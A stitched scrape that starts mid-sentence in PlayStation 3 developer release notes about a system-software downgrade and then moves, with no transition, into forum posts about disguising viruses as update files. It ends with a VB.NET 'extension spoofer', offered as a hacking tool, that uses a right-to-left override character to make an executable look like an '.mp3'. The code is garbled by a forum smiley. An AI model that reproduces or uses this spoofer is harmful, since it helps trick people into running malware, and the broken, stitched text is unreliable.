be returned to SCE for repair.

:Update Data

----------------------------------------------------------------------
Change in Release 355.001(Updated on 2011/01/27)
----------------------------------------------------------------------
<System Software (GUI)>
- An update data allowing system software 3.56 or later to be downgraded
to 3.55 has been newly released.

----------------------------------------------------------------------
Changes in Release 355.001
----------------------------------------------------------------------
[Bugfix]
<libcamera>
- (B#91443)
When an application was ended with the red LED indicator of
PlayStation(R)Eye on, although it went back to the system software,
the red LED indicator was still on. This problem has been fixed.

[Known Issues/Restrictions]
<Check menu in the Game column>
- Validation of a media or the file system itself cannot be performed
from the Check menu in the Game column.

When submitting a master disc, make sure to verify the disc that no error
is present using the Disc Image Generator for PlayStation(R)3 or
the Disc Image Checker for PlayStation(R)3.

- When performing the check from the Check menu in the Game column,
if the number of result files exceeds approximately 80 to 100 depending
on each check item, the file entries of the root directory in the USB
mass storage run out and the subsequent check result files may no
longer be stored.
In such case, move the check result files to another directory.

----------------------------------------------------------------------
Notes
----------------------------------------------------------------------
- The system software of the debugging station can be now downgraded
to 3.55.
Using this update data, you can also downgrade the system software
version 3.X0 or later to 3.55.

Note:
Please refer to "5 Updating Flash Memory -> Downgrading the Flash Memory"
of the "Reference Tool Software Setup Guide" document for more details

The PUP isn't associated to anything 95% of the time though, so there is nothing that will run it, and then run the exe in the background.

The closest thing to 'changing file names' of a virus you can do is call it something like ps3updatexe.pup, which would make it not be recognised by Sony, or cell+DECHexe.zip, cell+DECHcmd.zip, etc.
These are also obviously fake names.. Only an idiot would fall for them. And none of the packed files include names like this.

Do your research first.

[align=center]There's an extension spoofer in the Hacking Tools section right now. I thought I would show you guys how it can be made.

You must login or register to view this content.

     Public Sub Spoof(ByVal file As String, ByVal extension As String)
Dim b As Byte()
b = IO.File.ReadAllBytes(file)
Dim newPath As String

newPath = Application.StartupPath & ChrW(823Cool Man (aka Tustin) & StrReverse(extension) & ".exe"

IO.File.WriteAllBytes(newPath, b)

End Sub

Usage:

    Spoof(myfile, myextension)

For example:

    Spoof("C:\hello.exe", "mp3")

Also, to clear it up for you retards, YES, this does still execute your EXE even if it says ".mp3" or anything else at the end.
